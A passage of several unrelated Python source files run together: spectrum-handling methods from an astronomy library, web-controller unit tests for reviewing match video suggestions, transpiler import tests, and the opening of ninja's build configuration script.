def quicklook(self, filename=None, drawstyle='steps-mid', **kwargs):
"""
Plot the spectrum with current spectral units in the currently open
figure
kwargs are passed to `matplotlib.pyplot.plot`
Parameters
----------
filename : str or Non
Optional - the filename to save the quicklook to.
"""
from matplotlib import pyplot
ax = pyplot.gca()
ax.plot(self.spectral_axis, self.filled_data[:].value,
drawstyle=drawstyle, **kwargs)
ax.set_xlabel(self.spectral_axis.unit.to_string(format='latex'))
ax.set_ylabel(self.unit)
if filename is not None:
pyplot.gcf().savefig(filename)
def with_spectral_unit(self, unit, velocity_convention=None,
rest_value=None):
newwcs, newmeta = self._new_spectral_wcs(unit,
velocity_convention=velocity_convention,
rest_value=rest_value)
newheader = self._nowcs_header.copy()
newheader.update(newwcs.to_header())
wcs_cunit = u.Unit(newheader['CUNIT1'])
newheader['CUNIT1'] = unit.to_string(format='FITS')
newheader['CDELT1'] *= wcs_cunit.to(unit)
if self._mask is not None:
newmask = self._mask.with_spectral_unit(unit,
velocity_convention=velocity_convention,
rest_value=rest_value)
newmask._wcs = newwcs
else:
newmask = None
return self._new_spectrum_with(wcs=newwcs, spectral_unit=unit,
mask=newmask, meta=newmeta,
header=newheader)
def __getitem__(self, key, **kwargs):
# Ideally, this could just be in VaryingResolutionOneDSpectrum,
# but it's about the code is about the same length by just
# keeping it here.
try:
kwargs['beams'] = self.beams[key]
except (AttributeError, TypeError):
pass
new_qty = super(BaseOneDSpectrum, self).__getitem__(key)
if isinstance(key, slice):
new = self.__class__(value=new_qty.value,
unit=new_qty.unit,
copy=False,
wcs=wcs_utils.slice_wcs(self._wcs, key,
shape=self.shape),
meta=self._meta,
mask=(self._mask[key]
if self._mask is not nomask
else nomask),
header=self._header,
wcs_tolerance=self._wcs_tolerance,
fill_value=self.fill_value,
**kwargs)
return new
else:
if self._mask is not nomask:
# Kind of a hack; this is probably inefficient
bad = self._mask.exclude()[key]
new_qty[bad] = np.nan
return new_qty
def __getattribute__(self, attrname):
# This is a hack to handle dimensionality-reducing functions
# We want spectrum.max() to return a Quantity, not a spectrum
# Long-term, we really want `OneDSpectrum` to not inherit from
# `Quantity`, but for now this approach works.... we just have
# to add more functions to this list.
if attrname in ('min', 'max', 'std', 'mean', 'sum', 'cumsum',
'nansum', 'ptp', 'var'):
return getattr(self.quantity, attrname)
else:
return super(BaseOneDSpectrum, self).__getattribute__(attrname)
def spectral_interpolate(self, spectral_grid,
suppress_smooth_warning=False,
fill_value=None):
"""
Resample the spectrum onto a specific grid
Parameters
----------
spectral_grid : array
An array of the spectral positions to regrid onto
suppress_smooth_warning : bool
If disabled, a warning will be raised when interpolating onto a
grid that does not nyquist sample the existing grid. Disable this
if you have already appropriately smoothed the data.
fill_value : float
Value for extrapolated spectral values that lie outside of
the spectral range defined in the original data. The
default is to use the nearest spectral channel in the
cube.
Returns
-------
spectrum : OneDSpectrum
"""
assert spectral_grid.ndim == 1
inaxis = self.spectral_axis.to(spectral_grid.unit)
indiff = np.mean(np.diff(inaxis))
outdiff = np.mean(np.diff(spectral_grid))
# account for reversed axes
if outdiff < 0:
spectral_grid = spectral_grid[::-1]
outdiff = np.mean(np.diff(spectral_grid))
outslice = slice(None, None, -1)
else:
outslice = slice(None, None, 1)
specslice = slice(None) if indiff >= 0 else slice(None, None, -1)
inaxis = inaxis[specslice]
indiff = np.mean(np.diff(inaxis))
# insanity checks
if indiff < 0 or outdiff < 0:
raise ValueError("impossible.")
assert np.all(np.diff(spectral_grid) > 0)
assert np.all(np.diff(inaxis) > 0)
np.testing.assert_allclose(np.diff(spectral_grid), outdiff,
err_msg="Output grid must be linear")
if outdiff > 2 * indiff and not suppress_smooth_warning:
warnings.warn("Input grid has too small a spacing. The data should "
"be smoothed prior to resampling.",
SmoothingWarning
)
newspec = np.empty([spectral_grid.size], dtype=self.dtype)
newmask = np.empty([spectral_grid.size], dtype='bool')
newspec[outslice] = np.interp(spectral_grid.value, inaxis.value,
self.filled_data[specslice].value,
left=fill_value, right=fill_value)
mask = self.mask.include()
if all(mask):
newmask = np.ones([spectral_grid.size], dtype='bool')
else:
interped = np.interp(spectral_grid.value,
inaxis.value, mask[specslice]) > 0
newmask[outslice] = interped
newwcs = self.wcs.deepcopy()
newwcs.wcs.crpix[0] = 1
newwcs.wcs.crval[0] = spectral_grid[0].value if outslice.step > 0 \
else spectral_grid[-1].value
newwcs.wcs.cunit[0] = spectral_grid.unit.to_string(format='FITS')
newwcs.wcs.cdelt[0] = outdiff.value if outslice.step > 0 \
else -outdiff.value
newwcs.wcs.set()
newheader = self._nowcs_header.copy()
newheader.update(newwcs.to_header())
wcs_cunit = u.Unit(newheader['CUNIT1'])
newheader['CUNIT1'] = spectral_grid.unit.to_string(format='FITS')
newheader['CDELT1'] *= wcs_cunit.to(spectral_grid.unit)
newbmask = BooleanArrayMask(newmask, wcs=newwcs)
return self._new_spectrum_with(data=newspec, wcs=newwcs, mask=newbmask,
header=newheader,
spectral_unit=spectral_grid.unit)
def spectral_smooth(self, kernel,
convolve=convolution.convolve,
**kwargs):
"""
Smooth the spectrum
Parameters
----------
kernel : `~astropy.convolution.Kernel1D`
A 1D kernel from astropy
convolve : function
The astropy convolution function to use, either
`astropy.convolution.convolve` or
`astropy.convolution.convolve_fft`
kwargs : dict
Passed to the convolve function
"""
newspec = convolve(self.value, kernel, normalize_kernel=True, **kwargs)
return self._new_spectrum_with(data=newspec)
def to(self, unit, equivalencies=[]):
"""
Return a new `~spectral_cube.lower_dimensional_structures.OneDSpectrum`
of the same class with the specified unit.
See `astropy.units.Quantity.to` for further details.
"""
return super(BaseOneDSpectrum, self).to(unit, equivalencies, freq=None)
def with_fill_value(self, fill_value):
"""
Create a new :class:`OneDSpectrum` with a different ``fill_value``.
"""
return self._new_spectrum_with(fill_value=fill_value)
@property
def _new_thing_with(self):
return self._new_spectrum_with
def _new_spectrum_with(self, data=None, wcs=None, mask=None, meta=None,
fill_value=None, spectral_unit=None, unit=None,
header=None, wcs_tolerance=None,
**kwargs):
data = self._data if data is None else data
if unit is None and hasattr(data, 'unit'):
if data.unit != self.unit:
raise u.UnitsError("New data unit '{0}' does not"
" match unit '{1}'. You can"
" override this by specifying the"
" `unit` keyword."
.format(data.unit, self.unit))
unit = data.unit
elif unit is None:
unit = self.unit
elif unit is not None:
# convert string units to Units
if not isinstance(unit, u.Unit):
unit = u.Unit(unit)
if hasattr(data, 'unit'):
if u.Unit(unit) != data.unit:
raise u.UnitsError("The specified new cube unit '{0}' "
"does not match the input unit '{1}'."
.format(unit, data.unit))
else:
data = u.Quantity(data, unit=unit, copy=False)
wcs = self._wcs if wcs is None else wcs
mask = self._mask if mask is None else mask
if meta is None:
meta = {}
meta.update(self._meta)
if unit is not None:
meta['BUNIT'] = unit.to_string(format='FITS')
fill_value = self._fill_value if fill_value is None else fill_value
spectral_unit = self._spectral_unit if spectral_unit is None else u.Unit(spectral_unit)
spectrum = self.__class__(value=data, wcs=wcs, mask=mask, meta=meta,
unit=unit, fill_value=fill_value,
header=header or self._header,
wcs_tolerance=wcs_tolerance or self._wcs_tolerance,
**kwargs)
spectrum._spectral_unit = spectral_unit
return spectrum
class OneDSpectrum(BaseOneDSpectrum, BeamMixinClass):
def __new__(cls, value, beam=None, read_beam=False, **kwargs):
self = super(OneDSpectrum, cls).__new__(cls, value, **kwargs)
if beam is None:
if "beam" in self.meta:
beam = self.meta['beam']
elif read_beam:
beam = cube_utils.try_load_beam(self.header)
if beam is None:
warnings.warn("Cannot load beam from header.",
BeamWarning
)
if beam is not None:
self.beam = beam
self.meta['beam'] = beam
self._cache = {}
return self
def _new_spectrum_with(self, **kwargs):
beam = kwargs.pop('beam', None)
if 'beam' in self._meta and beam is None:
beam = self.beam
out = super(OneDSpectrum, self)._new_spectrum_with(beam=beam, **kwargs)
return out
def with_beam(self, beam):
'''
Attach a new beam object to the OneDSpectrum.
Parameters
----------
beam : `~radio_beam.Beam`
A new beam object.
'''
meta = self.meta.copy()
meta['beam'] = beam
return self._new_spectrum_with(beam=beam, meta=meta)
class VaryingResolutionOneDSpectrum(BaseOneDSpectrum, MultiBeamMixinClass):
def __new__(cls, value, beams=None, read_beam=False, goodbeams_mask=None, **kwargs):
self = super(VaryingResolutionOneDSpectrum, cls).__new__(cls, value, **kwargs)
assert hasattr(self, '_fill_value')
if beams is None:
if "beams" in self.meta:
beams = self.meta['beams']
elif read_beam:
beams = cube_utils.try_load_beams(self.header)
if beams is None:
warnings.warn("Cannot load beams table from header.",
BeamWarning
)
if beams is not None:
if isinstance(beams, BinTableHDU):
beam_data_table = beams.data
elif isinstance(beams, FITS_rec):
beam_data_table = beams
else:
beam_data_table = None
if beam_data_table is not None:
beams = Beams(major=u.Quantity(beam_data_table['BMAJ'], u.arcsec),
minor=u.Quantity(beam_data_table['BMIN'], u.arcsec),
pa=u.Quantity(beam_data_table['BPA'], u.deg),
meta=[{key: row[key] for key in beam_data_table.names
if key not in ('BMAJ','BPA', 'BMIN')}
for row in beam_data_table],)
self.beams = beams
self.meta['beams'] = beams
if goodbeams_mask is not None:
self.goodbeams_mask = goodbeams_mask
self._cache = {}
return self
@property
def hdu(self):
warnings.warn("There are multiple beams for this spectrum that "
"are being ignored when creating the HDU.",
BeamWarning
)
return super(VaryingResolutionOneDSpectrum, self).hdu
@property
def hdulist(self):
with warnings.catch_warnings():
warnings.simplefilter("ignore")
hdu = self.hdu
beamhdu = cube_utils.beams_to_bintable(self.beams)
return HDUList([hdu, beamhdu])
def _new_spectrum_with(self, **kwargs):
beams = kwargs.pop('beams', self.beams)
if beams is None:
beams = self.beams
VRODS = VaryingResolutionOneDSpectrum
out = super(VRODS, self)._new_spectrum_with(beams=beams,
**kwargs)
return out
def __array_finalize__(self, obj):
super(VaryingResolutionOneDSpectrum, self).__array_finalize__(obj)
self._beams = getattr(obj, '_beams', None)
if getattr(obj, 'goodbeams_mask', None) is not None:
# do NOT use the setter here, because we sometimes need to write
# intermediate size-mismatch things that later get fixed, e.g., in
# __getitem__ below
self._goodbeams_mask = getattr(obj, 'goodbeams_mask', None)
def __getitem__(self, key):
new_qty = super(VaryingResolutionOneDSpectrum, self).__getitem__(key)
# use the goodbeams_mask setter here because it checks size
new_qty.goodbeams_mask = self.goodbeams_mask[key]
new_qty.beams = self.unmasked_beams[key]
return new_qty
| |
from datetime import datetime
import unittest2
import webapp2
import webtest
from google.appengine.datastore import datastore_stub_util
from google.appengine.ext import ndb
from google.appengine.ext import testbed
from webapp2_extras.routes import RedirectRoute
from consts.account_permissions import AccountPermissions
from consts.district_type import DistrictType
from consts.event_type import EventType
from controllers.suggestions.suggest_match_video_review_controller import \
SuggestMatchVideoReviewController
from helpers.suggestions.suggestion_creator import SuggestionCreator
from models.account import Account
from models.event import Event
from models.match import Match
from models.media import Media
from models.suggestion import Suggestion
class TestSuggestEventWebcastController(unittest2.TestCase):
def loginUser(self):
self.testbed.setup_env(
user_email="user@example.com",
user_id="123",
user_is_admin='0',
overwrite=True)
self.account = Account.get_or_insert(
"123",
email="user@example.com",
registered=True)
def givePermission(self):
self.account.permissions.append(AccountPermissions.REVIEW_MEDIA)
self.account.put()
def createSuggestion(self):
status = SuggestionCreator.createMatchVideoYouTubeSuggestion(self.account.key,
"H-54KMwMKY0",
"2016necmp_f1m1")
self.assertEqual(status, 'success')
return Suggestion.render_media_key_name(2016, 'match', '2016necmp_f1m1', 'youtube', 'H-54KMwMKY0')
def setUp(self):
self.policy = datastore_stub_util.PseudoRandomHRConsistencyPolicy(probability=1)
self.testbed = testbed.Testbed()
self.testbed.activate()
self.testbed.init_datastore_v3_stub(consistency_policy=self.policy)
self.testbed.init_memcache_stub()
self.testbed.init_user_stub()
self.testbed.init_urlfetch_stub()
self.testbed.init_taskqueue_stub(_all_queues_valid=True)
ndb.get_context().clear_cache() # Prevent data from leaking between tests
app = webapp2.WSGIApplication([
RedirectRoute(r'/suggest/match/video/review', SuggestMatchVideoReviewController, 'suggest-video', strict_slash=True),
], debug=True)
self.testapp = webtest.TestApp(app)
self.event = Event(
id="2016necmp",
name="New England District Championship",
event_type_enum=EventType.DISTRICT_CMP,
event_district_enum=DistrictType.NEW_ENGLAND,
short_name="New England",
event_short="necmp",
year=2016,
end_date=datetime(2016, 03, 27),
official=False,
city='Hartford',
state_prov='CT',
country='USA',
venue="Some Venue",
venue_address="Some Venue, Hartford, CT, USA",
timezone_id="America/New_York",
start_date=datetime(2016, 03, 24),
webcast_json="",
website="http://www.firstsv.org",
)
self.event.put()
self.match = Match(
id="2016necmp_f1m1",
event=ndb.Key(Event, "2016necmp"),
year=2016,
comp_level="f",
set_number=1,
match_number=1,
team_key_names=['frc846', 'frc2135', 'frc971', 'frc254', 'frc1678', 'frc973'],
time=datetime.fromtimestamp(1409527874),
time_string="4:31 PM",
tba_videos=[],
alliances_json='{\
"blue": {\
"score": 270,\
"teams": [\
"frc846",\
"frc2135",\
"frc971"]},\
"red": {\
"score": 310,\
"teams": [\
"frc254",\
"frc1678",\
"frc973"]}}',
score_breakdown_json = '{\
"blue": {\
"auto": 70,\
"teleop_goal+foul": 40,\
"assist": 120,\
"truss+catch": 40\
},"red": {\
"auto": 70,\
"teleop_goal+foul": 50,\
"assist": 150,\
"truss+catch": 40}}'
)
self.match.put()
self.match2 = Match(
id="2016necmp_f1m2",
event=ndb.Key(Event, "2016necmp"),
year=2016,
comp_level="f",
set_number=1,
match_number=2,
team_key_names=['frc846', 'frc2135', 'frc971', 'frc254', 'frc1678', 'frc973'],
time=datetime.fromtimestamp(1409527874),
time_string="4:31 PM",
tba_videos=[],
alliances_json='{\
"blue": {\
"score": 270,\
"teams": [\
"frc846",\
"frc2135",\
"frc971"]},\
"red": {\
"score": 310,\
"teams": [\
"frc254",\
"frc1678",\
"frc973"]}}',
score_breakdown_json = '{\
"blue": {\
"auto": 70,\
"teleop_goal+foul": 40,\
"assist": 120,\
"truss+catch": 40\
},"red": {\
"auto": 70,\
"teleop_goal+foul": 50,\
"assist": 150,\
"truss+catch": 40}}'
)
self.match2.put()
def tearDown(self):
self.testbed.deactivate()
def getSuggestionForm(self):
response = self.testapp.get('/suggest/match/video/review')
self.assertEqual(response.status_int, 200)
form = response.forms.get('review_videos', None)
self.assertIsNotNone(form)
return form
def testLogInRedirect(self):
response = self.testapp.get('/suggest/match/video/review', status='3*')
response = response.follow(expect_errors=True)
self.assertTrue(response.request.path.startswith("/account/login_required"))
def testNoPermissions(self):
self.loginUser()
response = self.testapp.get('/suggest/match/video/review', status='3*')
response = response.follow(expect_errors=True)
self.assertEqual(response.request.path, '/')
def testNothingToReview(self):
self.loginUser()
self.givePermission()
response = self.testapp.get('/suggest/match/video/review')
self.assertEqual(response.status_int, 200)
def testAcceptSuggestion(self):
self.loginUser()
self.givePermission()
suggestion_id = self.createSuggestion()
form = self.getSuggestionForm()
form.set('accept_keys[]', suggestion_id)
response = form.submit().follow()
self.assertEqual(response.status_int, 200)
# Make sure we mark the Suggestion as REVIEWED
suggestion = Suggestion.get_by_id(suggestion_id)
self.assertIsNotNone(suggestion)
self.assertEqual(suggestion.review_state, Suggestion.REVIEW_ACCEPTED)
# Make sure the video gets associated
match = Match.get_by_id(self.match.key_name)
self.assertIsNotNone(match)
self.assertIsNotNone(match.youtube_videos)
self.assertTrue('H-54KMwMKY0' in match.youtube_videos)
def testAcceptNewKey(self):
self.loginUser()
self.givePermission()
suggestion_id = self.createSuggestion()
form = self.getSuggestionForm()
form.set('accept_keys[]', suggestion_id)
form.set('key-{}'.format(suggestion_id), '2016necmp_f1m2')
response = form.submit().follow()
self.assertEqual(response.status_int, 200)
# Make sure we mark the Suggestion as REVIEWED
suggestion = Suggestion.get_by_id(suggestion_id)
self.assertIsNotNone(suggestion)
self.assertEqual(suggestion.review_state, Suggestion.REVIEW_ACCEPTED)
# Make sure the video gets associated
match = Match.get_by_id(self.match2.key_name)
self.assertIsNotNone(match)
self.assertIsNotNone(match.youtube_videos)
self.assertTrue('H-54KMwMKY0' in match.youtube_videos)
# Make sure we don't add it to the first match
match = Match.get_by_id(self.match.key_name)
self.assertIsNotNone(match)
self.assertIsNotNone(match.youtube_videos)
self.assertFalse('H-54KMwMKY0' in match.youtube_videos)
def testAcceptBadKey(self):
self.loginUser()
self.givePermission()
suggestion_id = self.createSuggestion()
form = self.getSuggestionForm()
form.set('accept_keys[]', suggestion_id)
form.set('key-{}'.format(suggestion_id), '2016necmp_f1m3') # This match doesn't exist
response = form.submit().follow()
self.assertEqual(response.status_int, 200)
# Make sure we don't mark the Suggestion as REVIEWED
suggestion = Suggestion.get_by_id(suggestion_id)
self.assertIsNotNone(suggestion)
self.assertEqual(suggestion.review_state, Suggestion.REVIEW_PENDING)
# Make sure the video doesn't get associated
match = Match.get_by_id(self.match.key_name)
self.assertIsNotNone(match)
self.assertIsNotNone(match.youtube_videos)
self.assertFalse('H-54KMwMKY0' in match.youtube_videos)
def testRejectSuggestion(self):
self.loginUser()
self.givePermission()
suggestion_id = self.createSuggestion()
form = self.getSuggestionForm()
form.set('reject_keys[]', suggestion_id)
response = form.submit().follow()
self.assertEqual(response.status_int, 200)
# Make sure we mark the Suggestion as REVIEWED
suggestion = Suggestion.get_by_id(suggestion_id)
self.assertIsNotNone(suggestion)
self.assertEqual(suggestion.review_state, Suggestion.REVIEW_REJECTED)
# Make sure the video gets associated
match = Match.get_by_id(self.match.key_name)
self.assertIsNotNone(match)
self.assertFalse(match.youtube_videos)
| |
import os
from ..utils import TranspileTestCase
class ImportTests(TranspileTestCase):
def test_import_stdlib_module(self):
"You can import a Python module implemented in Java (a native stdlib shim)"
self.assertCodeExecution(
"""
import time
time.time()
print("Done.")
""")
def test_import_module(self):
"You can import a Python module implemented in Python"
self.assertCodeExecution(
"""
import example
example.some_method()
print("Done.")
""",
extra_code={
'example':
"""
print("Now we're in the example module")
def some_method():
print("Now we're calling a module method")
"""
})
def test_import_module_main(self):
"You can import a Python module with if __name__ == '__main__'"
self.assertCodeExecution(
"""
import example
print('A')
if __name__ == "__main__":
print('main')
print('B')
""",
extra_code={
'example':
"""
print('C')
if __name__ == "__main__":
print('example main')
print('D')
"""
})
def test_multiple_module_import(self):
"You can import a multiple Python modules implemented in Python"
self.assertCodeExecution(
"""
import example, other
example.some_method()
other.other_method()
print("Done.")
""",
extra_code={
'example':
"""
print("Now we're in the example module")
def some_method():
print("Now we're calling a module method")
""",
'other':
"""
print("Now we're in the other module")
def other_method():
print("Now we're calling another module method")
"""
})
def test_full_dotted_path(self):
self.assertCodeExecution(
"""
import example.submodule
example.submodule.some_method()
print("Done.")
""",
extra_code={
'example.__init__':
"""
print("Initializing the example module")
""",
'example.submodule':
"""
print("Now we're in example.submodule")
def some_method():
print("Now we're calling a submodule method")
"""
})
def test_module_from_dotted_path(self):
self.assertCodeExecution(
"""
from example import submodule
submodule.some_method()
print("Done.")
""",
extra_code={
'example.__init__':
"""
print("Initializing the example module")
""",
'example.submodule':
"""
print("Now we're in example.submodule")
def some_method():
print("Now we're calling a submodule method")
"""
})
def test_symbol_from_dotted_path(self):
self.assertCodeExecution(
"""
from example.submodule import some_method
some_method()
print("Done.")
""",
extra_code={
'example.__init__':
"""
print("Initializing the example module")
""",
'example.submodule':
"""
print("Now we're in example.submodule")
def some_method():
print("Now we're calling a submodule method")
"""
})
def test_full_deep_dotted_path(self):
self.assertCodeExecution(
"""
import example.submodule.subsubmodule.another
example.submodule.subsubmodule.another.another_method()
print("Done.")
""",
extra_code={
'example.__init__':
"""
print("Initializing the example module")
""",
'example.submodule.__init__':
"""
print("Now we're in example.submodule.__init__")
""",
'example.submodule.other':
"""
print("Now we're in example.submodule.other")
def other_method():
print("Now we're calling a submodule method")
""",
'example.submodule.subsubmodule.__init__':
"""
print("Now we're in example.submodule.subsubmodule.__init__")
""",
'example.submodule.subsubmodule.another':
"""
print("Now we're in example.submodule.subsubmodule.another")
def another_method():
print("Now we're calling a subsubmodule method")
"""
})
def test_module_from_deep_dotted_path(self):
self.assertCodeExecution(
"""
from example.submodule.subsubmodule import another
another.another_method()
print("Done.")
""",
extra_code={
'example.__init__':
"""
print("Initializing the example module")
""",
'example.submodule.__init__':
"""
print("Now we're in example.submodule.__init__")
""",
'example.submodule.other':
"""
print("Now we're in example.submodule.other")
def other_method():
print("Now we're calling a submodule method")
""",
'example.submodule.subsubmodule.__init__':
"""
print("Now we're in example.submodule.subsubmodule.__init__")
""",
'example.submodule.subsubmodule.another':
"""
print("Now we're in example.submodule.subsubmodule.another")
def another_method():
print("Now we're calling a subsubmodule method")
"""
})
def test_symbol_from_deep_dotted_path(self):
self.assertCodeExecution(
"""
from example.submodule.subsubmodule.another import another_method
another_method()
print("Done.")
""",
extra_code={
'example.__init__':
"""
print("Initializing the example module")
""",
'example.submodule.__init__':
"""
print("Now we're in example.submodule.__init__")
""",
'example.submodule.other':
"""
print("Now we're in example.submodule.other")
def other_method():
print("Now we're calling a submodule method")
""",
'example.submodule.subsubmodule.__init__':
"""
print("Now we're in example.submodule.subsubmodule.__init__")
""",
'example.submodule.subsubmodule.another':
"""
print("Now we're in example.submodule.subsubmodule.another")
def another_method():
print("Now we're calling a subsubmodule method")
"""
})
def test_symbol_import(self):
self.assertCodeExecution(
"""
from example import some_method
some_method()
print("Done.")
""",
extra_code={
'example':
"""
print("Now we're in the example module")
def some_method():
print("Now we're calling a module method")
"""
})
def test_multiple_symbol_import(self):
self.assertCodeExecution(
"""
from example import some_method, other_method
print("Call some method...")
some_method()
print("Call another method...")
other_method()
try:
print("But this will fail...")
third_method()
except NameError:
print("Which it does.")
print("Done.")
""",
extra_code={
'example':
"""
print("Now we're in the example module")
def some_method():
print("Now we're calling a module method")
def other_method():
print("Now we're calling another module method")
def third_method():
print("This shouldn't be called")
"""
})
def test_import_star(self):
self.assertCodeExecution(
"""
from example import *
print("Call some method...")
some_method()
print("Call another method...")
other_method()
print("Call a third method...")
third_method()
print("Done.")
""",
extra_code={
'example':
"""
print("Now we're in the example module")
def some_method():
print("Now we're calling a module method")
def other_method():
print("Now we're calling another module method")
def third_method():
print("Now we're calling a third module method")
"""
}, run_in_function=False)
def test_import_star_with_all(self):
self.assertCodeExecution(
"""
from example import *
print("Call some method...")
some_method()
print("Call another method...")
other_method()
try:
print("But this will fail...")
third_method()
except NameError:
print("Which it does.")
print("Done.")
""",
extra_code={
'example':
"""
__all__ = ['some_method', 'other_method']
print("Now we're in the example module")
def some_method():
print("Now we're calling a module method")
def other_method():
print("Now we're calling another module method")
def third_method():
print("This shouldn't be called")
"""
}, run_in_function=False)
def test_import_from_dot(self):
self.assertCodeExecution(
"""
from example import submodule2
submodule2.method()
print("Done.")
""",
extra_code={
'example.__init__':
"""
""",
'example.submodule1':
"""
def method():
print("Calling method in submodule1")
""",
'example.submodule2':
"""
from . import submodule1
def method():
print("Calling method in submodule2")
submodule1.method()
""",
})
def test_import_from_local_dot(self):
self.assertCodeExecution(
"""
from submodule import method1, method2
method1()
method2()
print("Done.")
""",
extra_code={
'submodule.__init__':
"""
print("in submodule/__init__.py")
from .modulea import method2
def method1():
print("Calling method in submodule.__init__")
""",
'submodule.modulea':
"""
print("in submodule/modulea.py")
def method2():
print("Calling method in submodule.modulea")
""",
})
def test_import_from_local_dot_sibling(self):
self.assertCodeExecution(
"""
from submodule.moduleb import method3, method2
method3()
method2()
print("Done.")
""",
extra_code={
'submodule.__init__':
"""
print("in submodule/__init__.py")
def method1():
print("Calling method1 in submodule.__init__")
""",
'submodule.modulea':
"""
print("in submodule/modulea.py")
def method2():
print("Calling method2 in submodule.modulea")
""",
'submodule.moduleb':
"""
print("in submodule/moduleb.py")
from .modulea import method2
def method3():
print("Calling method3 in submodule.moduleb")
""",
})
def test_import_from_local_dot_deep(self):
self.assertCodeExecution(
"""
from submodule import method1, method2, method3, method4
method1()
method2()
method3()
method4()
print("Done.")
""",
extra_code={
'submodule.__init__':
"""
print("in submodule/__init__.py")
from .modulea import method2
from .subsubmodule import method3, method4
def method1():
print("Calling method1 in submodule.__init__")
""",
'submodule.modulea':
"""
print("in submodule/modulea.py")
def method2():
print("Calling method2 in submodule.modulea")
""",
'submodule.subsubmodule.__init__':
"""
print("in submodule/subsubmodule/__init__.py")
from .submodulea import method4
def method3():
print("Calling method3 in submodule.subsubmodule.__init__")
""",
'submodule.subsubmodule.submodulea':
"""
print("in submodule/subsubmodule/submodulea.py")
def method4():
print("Calling method4 in submodule.subsubmodule.submodula")
""",
})
def test_import_from_deep_upstream(self):
self.assertCodeExecution(
"""
from submodule.subsubmodule.submodulea import method
method()
print("Done.")
""",
extra_code={
'submodule.__init__':
"""
print("in submodule/__init__.py")
def method1():
print("Calling method in submodule.__init__")
""",
'submodule.modulea':
"""
print("in submodule/modulea.py")
def method2():
print("Calling method in submodule.modulea")
""",
'submodule.moduleb':
"""
print("in submodule/moduleb.py")
def method3():
print("Calling method in submodule.moduleb")
""",
'submodule.modulec':
"""
print("in submodule/modulec.py")
def method4():
print("Calling method in submodule.modulec")
""",
'submodule.moduled.__init__':
"""
print("in submodule/moduled/__init__.py")
def method5():
print("Calling method in submodule.moduled")
""",
'submodule.moduled.submoduled':
"""
print("in submodule/moduled/submoduled.py")
def method6():
print("Calling method in submodule.moduled.submoduled")
""",
'submodule.subsubmodule.__init__':
"""
print("in submodule/subsubmodule/__init__.py")
def method7():
print("Calling method in submodule.subsubmodule.__init__")
""",
'submodule.subsubmodule.submodulea':
"""
print("in submodule/subsubmodule/submodulea.py")
from .. import moduleb
from ..modulec import method4
from ..moduled import method5, submoduled
def method():
print("Calling method4 in submodule.subsubmodule.submodulea")
moduleb.method3()
method4()
method5()
submoduled.method6()
""",
})
class NativeImportTests(TranspileTestCase):
def test_import_java_module_static_method(self):
"You can invoke a static method from a native Java namespace"
self.assertJavaExecution(
"""
from java import lang
props = lang.System.getProperties()
print(props.get("file.separator"))
print("Done.")
""",
"""
%s
Done.
""" % os.path.sep)
def test_import_java_class_static_method(self):
"You can invoke a static method from a native Java class"
self.assertJavaExecution(
"""
from java.lang import System
props = System.getProperties()
print(props.get("file.separator"))
print("Done.")
""",
"""
%s
Done.
""" % os.path.sep)
def test_import_java_module(self):
"You can import a native Java namespace as a Python module"
self.assertJavaExecution(
"""
from java import lang
buf = lang.StringBuilder()
buf.append('Hello, ')
buf.append('World')
print(buf.toString())
print("Done.")
""",
"""
Hello, World
Done.
""")
def test_import_java_class(self):
"You can import a native Java class as a Python module"
self.assertJavaExecution(
"""
from java.lang import StringBuilder
buf = StringBuilder()
buf.append('Hello, ')
buf.append('World')
print(buf.toString())
print("Done.")
""",
"""
Hello, World
Done.
""")
class BuiltinsImportTests(TranspileTestCase):
def test_import_builtins(self):
self.assertCodeExecution("""
import builtins
print(builtins.abs(-42))
print("Done")
""")
def test_import_from_builtins(self):
self.assertCodeExecution("""
from builtins import abs
print(abs(-42))
print("Done")
""")
def test_import_from_builtins_as(self):
self.assertCodeExecution("""
from builtins import abs as _abs
print(_abs(-42))
print("Done")
""")
| |
#!/usr/bin/env python
#
# Copyright 2001 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Script that generates the build.ninja for ninja itself.
Projects that use ninja themselves should either write a similar script
or use a meta-build system that supports Ninja output."""
from optparse import OptionParser
import os
import sys
sys.path.insert(0, 'misc')
import ninja_syntax
parser = OptionParser()
platforms = ['linux', 'freebsd', 'mingw', 'windows']
profilers = ['gmon', 'pprof']
parser.add_option('--platform',
help='target platform (' + '/'.join(platforms) + ')',
choices=platforms)
parser.add_option('--host',
help='host platform (' + '/'.join(platforms) + ')',
choices=platforms)
parser.add_option('--debug', action='store_true',
help='enable debugging extras',)
parser.add_option('--profile', metavar='TYPE',
choices=profilers,
help='enable profiling (' + '/'.join(profilers) + ')',)
parser.add_option('--with-gtest', metavar='PATH',
help='use gtest unpacked in directory PATH')
parser.add_option('--with-python', metavar='EXE',
help='use EXE as the Python interpreter',
default=os.path.basename(sys.executable))
parser.add_option('--with-msvc-helper', metavar='NAME',
help="name for ninja-msvc-helper binary (MSVC only)")
(options, args) = parser.parse_args()
if args:
print 'ERROR: extra unparsed command-line arguments:', args
sys.exit(1)
platform = options.platform
if platform is None:
platform = sys.platform
if platform.startswith('linux'):
platform = 'linux'
elif platform.startswith('freebsd'):
platform = 'freebsd'
elif platform.startswith('mingw'):
platform = 'mingw'
elif platform.startswith('win'):
platform = 'windows'
host = options.host or platform
BUILD_FILENAME = 'build.ninja'
buildfile = open(BUILD_FILENAME, 'w')
n = ninja_syntax.Writer(buildfile)
n.comment('This file is used to build ninja itself.')
n.comment('It is generated by ' + os.path.basename(__file__) + '.')
n.newline()
n.comment('The arguments passed to configure.py, for rerunning it.')
n.variable('configure_args', ' '.join(sys.argv[1:]))
env_keys = set(['CXX', 'AR', 'CFLAGS', 'LDFLAGS'])
configure_env = dict((k, os.environ[k]) for k in os.environ if k in env_keys)
if configure_env:
config_str = ' '.join([k + '=' + configure_env[k] for k in configure_env])
n.variable('configure_env', config_str + '$ ')
n.newline()
CXX = configure_env.get('CXX', 'g++')
objext = '.o'
if platform == 'windows':
CXX = 'cl'
objext = '.obj'
def src(filename):
return os.path.join('src', filename)
def built(filename):
return os.path.join('$builddir', filename)
def doc(filename):
return os.path.join('doc', filename)
def cc(name, **kwargs):
return n.build(built(name + objext), 'cxx', src(name + '.c'), **kwargs)
def cxx(name, **kwargs):
